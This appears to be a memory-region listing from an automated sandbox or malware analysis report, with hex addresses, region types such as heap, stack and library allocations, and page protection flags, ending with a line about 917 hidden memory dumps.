page read and write
2E50000
trusted library allocation
page read and write
325A000
stack
page read and write
4DAF000
trusted library allocation
page read and write
362C000
heap
page read and write
4D0A000
heap
page read and write
6A2F000
heap
page read and write
5600000
heap
page read and write
3044000
heap
page read and write
2A51000
heap
page read and write
4CC6000
heap
page read and write
4C80000
heap
page read and write
358E000
heap
page read and write
3044000
heap
page read and write
4CEA000
heap
page read and write
3080000
heap
page read and write
2AA7000
heap
page read and write
4CF0000
heap
page read and write
74B0000
trusted library allocation
page read and write
4CC5000
heap
page read and write
2A53000
heap
page read and write
4CCE000
heap
page read and write
2B21000
heap
page read and write
2A6B000
heap
page read and write
4D30000
heap
page read and write
3084000
heap
page read and write
3044000
heap
page read and write
374F000
stack
page read and write
4C6E000
stack
page read and write
593D000
heap
page read and write
360B000
heap
page read and write
5660000
heap
page read and write
400000
system
page execute and read and write
3622000
heap
page read and write
560D000
stack
page read and write
FFE000
heap
page read and write
5B53000
heap
page read and write
3084000
heap
page read and write
3044000
heap
page read and write
2E39000
trusted library allocation
page read and write
4CD1000
heap
page read and write
6BD4000
trusted library allocation
page read and write
5B10000
heap
page read and write
2B7D000
heap
page read and write
4CB1000
heap
page read and write
5942000
heap
page read and write
364F000
heap
page read and write
3483000
heap
page read and write
93C0000
trusted library allocation
page read and write
547F000
stack
page read and write
360B000
heap
page read and write
2F30000
heap
page readonly
3190000
heap
page read and write
4CED000
heap
page read and write
3044000
heap
page read and write
2FE8000
heap
page read and write
5998000
heap
page read and write
9FC000
stack
page read and write
34C9000
heap
page read and write
2EC0000
trusted library allocation
page execute and read and write
4DCF000
trusted library allocation
page read and write
5D3F000
stack
page read and write
364E000
stack
page read and write
6B65000
heap
page execute and read and write
580F000
stack
page read and write
2A1F000
heap
page read and write
5280000
heap
page read and write
4D51000
heap
page read and write
35ED000
heap
page read and write
2E30000
trusted library allocation
page read and write
717F000
stack
page read and write
593C000
heap
page read and write
2F20000
heap
page read and write
6D68000
trusted library allocation
page read and write
5600000
trusted library allocation
page read and write
4CB1000
heap
page read and write
2DAF000
stack
page read and write
2AC3000
heap
page read and write
4CC0000
heap
page read and write
5650000
heap
page read and write
348D000
heap
page read and write
2A63000
heap
page read and write
35B1000
heap
page read and write
2A6F000
heap
page read and write
3D16000
unclassified section
page execute and read and write
595E000
heap
page read and write
6A2F000
heap
page read and write
4CF2000
heap
page read and write
7330000
heap
page execute and read and write
2CED000
heap
page read and write
362F000
heap
page read and write
362C000
heap
page read and write
743A000
heap
page read and write
3084000
heap
page read and write
4CB1000
heap
page read and write
4CC1000
heap
page read and write
474000
system
page execute and read and write
55FF000
stack
page read and write
2E20000
trusted library allocation
page read and write
4D24000
trusted library allocation
page read and write
2A51000
heap
page read and write
2AF0000
heap
page read and write
6D61000
trusted library allocation
page read and write
29AE000
stack
page read and write
2EA0000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
4CD1000
heap
page read and write
2F7E000
stack
page read and write
2860000
heap
page read and write
59DC000
heap
page read and write
3044000
heap
page read and write
4D51000
heap
page read and write
4D33000
heap
page read and write
4CF3000
heap
page read and write
595E000
heap
page read and write
5910000
heap
page read and write
2E90000
heap
page read and write
4CBC000
heap
page read and write
3360000
heap
page read and write
4CD1000
heap
page read and write
3620000
heap
page read and write
6DBE000
stack
page read and write
5281000
heap
page read and write
6A33000
heap
page read and write
5600000
trusted library allocation
page read and write
456000
system
page execute and read and write
4CB1000
heap
page read and write
4CB9000
heap
page read and write
1020000
heap
page read and write
522E000
stack
page read and write
7830000
heap
page read and write
7650000
trusted library allocation
page read and write
4CD1000
heap
page read and write
3044000
heap
page read and write
2A57000
heap
page read and write
6D3D000
stack
page read and write
4CC1000
heap
page read and write
2A1F000
heap
page read and write
3045000
heap
page read and write
45F0000
heap
page read and write
2B72000
heap
page read and write
6EBE000
stack
page read and write
3030000
heap
page readonly
2AC0000
heap
page read and write
59D5000
heap
page read and write
35F9000
heap
page read and write
2840000
heap
page read and write
2FFC000
heap
page read and write
4CD1000
heap
page read and write
2AC6000
heap
page read and write
4BE8000
trusted library allocation
page read and write
6A25000
heap
page read and write
2A40000
heap
page read and write
5942000
heap
page read and write
348D000
heap
page read and write
4CE4000
heap
page read and write
35B1000
heap
page read and write
2D97000
stack
page read and write
7460000
trusted library allocation
page read and write
5600000
trusted library allocation
page read and write
F9C000
heap
page read and write
734A000
trusted library allocation
page read and write
2D7E000
stack
page read and write
837E000
stack
page read and write
4CF2000
heap
page read and write
6B31000
trusted library allocation
page read and write
3044000
heap
page read and write
51B9000
heap
page read and write
2DD0000
heap
page read and write
335F000
stack
page read and write
5B12000
heap
page read and write
6B25000
trusted library allocation
page read and write
3D1C000
unclassified section
page execute and read and write
3084000
heap
page read and write
360B000
heap
page read and write
4A80000
heap
page read and write
3628000
heap
page read and write
722C000
stack
page read and write
7360000
heap
page read and write
3578000
heap
page read and write
2AD0000
heap
page read and write
2FE0000
heap
page read and write
4CCE000
heap
page read and write
4CCE000
heap
page read and write
4D6F000
stack
page read and write
5FBF000
stack
page read and write
3E12000
heap
page read and write
35A2000
heap
page read and write
2AC3000
heap
page read and write
35ED000
heap
page read and write
3175000
heap
page read and write
362C000
heap
page read and write
3044000
heap
page read and write
4CBC000
heap
page read and write
5281000
heap
page read and write
5B2F000
heap
page read and write
4CC1000
heap
page read and write
7670000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
2A49000
heap
page read and write
2A9F000
heap
page read and write
2CEC000
heap
page read and write
5281000
heap
page read and write
2BAF000
heap
page read and write
2E80000
heap
page readonly
35A2000
heap
page read and write
4CC3000
heap
page read and write
311E000
stack
page read and write
5281000
heap
page read and write
5B2A000
heap
page read and write
2AFA000
heap
page read and write
F9E000
heap
page read and write
58C0000
heap
page read and write
F93000
heap
page read and write
4CD3000
heap
page read and write
2CFE000
stack
page read and write
4CD5000
heap
page read and write
376E000
stack
page read and write
365A000
heap
page read and write
4CD3000
heap
page read and write
2A70000
heap
page read and write
4CED000
heap
page read and write
73E000
stack
page read and write
362F000
heap
page read and write
7F000000
trusted library allocation
page execute and read and write
3084000
heap
page read and write
45CE000
stack
page read and write
828000
heap
page read and write
6A3B000
heap
page read and write
4D51000
heap
page read and write
35D5000
heap
page read and write
364F000
heap
page read and write
3363000
heap
page read and write
5C3E000
stack
page read and write
4CD1000
heap
page read and write
35E3000
heap
page read and write
557F000
stack
page read and write
2E4A000
trusted library allocation
page execute and read and write
6B60000
heap
page execute and read and write
2A9F000
heap
page read and write
595E000
heap
page read and write
2A2F000
heap
page read and write
60FE000
stack
page read and write
4CB1000
heap
page read and write
6B35000
trusted library allocation
page read and write
4A40000
heap
page execute and read and write
4CCE000
heap
page read and write
4E00000
heap
page read and write
6BD0000
trusted library allocation
page read and write
3980000
heap
page read and write
F10000
heap
page read and write
4DE2000
trusted library allocation
page read and write
3607000
heap
page read and write
4DBE000
trusted library allocation
page read and write
4CD3000
heap
page read and write
4F6C000
stack
page read and write
4EDD000
trusted library allocation
page read and write
2A4D000
heap
page read and write
4CB9000
heap
page read and write
35F9000
heap
page read and write
362A000
heap
page read and write
4CFD000
heap
page read and write
4CB1000
heap
page read and write
96F0000
heap
page read and write
2720000
heap
page read and write
4CEA000
heap
page read and write
4DBE000
stack
page read and write
3D4B000
unclassified section
page execute and read and write
8160000
heap
page read and write
6BDB000
trusted library allocation
page read and write
5942000
heap
page read and write
4CC0000
heap
page read and write
4CB1000
heap
page read and write
30F0000
heap
page read and write
4CB6000
heap
page read and write
4CB1000
heap
page read and write
5281000
heap
page read and write
34C9000
heap
page read and write
4CD1000
heap
page read and write
3160000
heap
page read and write
29C000
stack
page read and write
4CD1000
heap
page read and write
6EFB000
stack
page read and write
362C000
heap
page read and write
3084000
heap
page read and write
4FC0000
heap
page read and write
740B000
heap
page read and write
45E0000
heap
page read and write
35ED000
heap
page read and write
4CD1000
heap
page read and write
96FC000
heap
page read and write
2E97000
heap
page read and write
2AC6000
heap
page read and write
3045000
heap
page read and write
4CDA000
heap
page read and write
3044000
heap
page read and write
5600000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
283E000
stack
page read and write
400000
system
page execute and read and write
29E0000
heap
page read and write
7330000
heap
page read and write
336C000
heap
page read and write
3045000
heap
page read and write
7630000
trusted library allocation
page read and write
6A2F000
heap
page read and write
4CC1000
heap
page read and write
4CD1000
heap
page read and write
2D7C000
stack
page read and write
4CEE000
heap
page read and write
4CB0000
heap
page read and write
73BB000
heap
page read and write
5110000
trusted library allocation
page read and write
598D000
heap
page read and write
3045000
heap
page read and write
4CDA000
heap
page read and write
4CF2000
heap
page read and write
2A9F000
heap
page read and write
7600000
trusted library allocation
page read and write
2A6F000
heap
page read and write
3D0000
heap
page read and write
4CCE000
heap
page read and write
4CC5000
heap
page read and write
2EB6000
trusted library allocation
page read and write
364F000
heap
page read and write
6B0E000
stack
page read and write
340000
heap
page read and write
5281000
heap
page read and write
There are 917 hidden memdumps, click here to show them.